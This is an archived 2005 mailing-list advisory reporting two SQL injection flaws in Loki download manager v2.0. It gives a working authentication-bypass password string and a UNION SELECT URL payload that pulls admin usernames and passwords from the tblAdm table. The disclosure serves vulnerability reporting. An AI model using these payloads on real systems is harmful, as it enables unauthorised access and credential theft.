Security Advisory: 2 SQL injection in Loki download manager v2.0

[EN] securityvulns.ru
no-pyccku

Related information
  PHP, ASP, CGI web applications security vulnerabilities
  [EXPL] Invision Power Board SQL Injection (Cookie, Exploit 2)
  Webhints v1.03 Remote Command Execution
  osCommere HTTP Response Splitting
  [SA15658] Ovidentia FX "babInstallPath"
File Inclusion Vulnerability

From: hack_912_(at)_hotmail.com <hack_912_(at)_hotmail.com>
Date: 09.06.2005
Subject: 2 SQL injection in Loki download manager v2.0

hi all

tow SQL injection in Loki download manager

1. in http://localhost/adm/default.asp

user: anyuser
pass: 'or''='

2. in http://localhost/downmancv/catinfo.asp?cat=' union select
null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM tblAdm '

and u will have user and pass h4ve F4n

Salmanooh

hack_912@hotmail.com

test server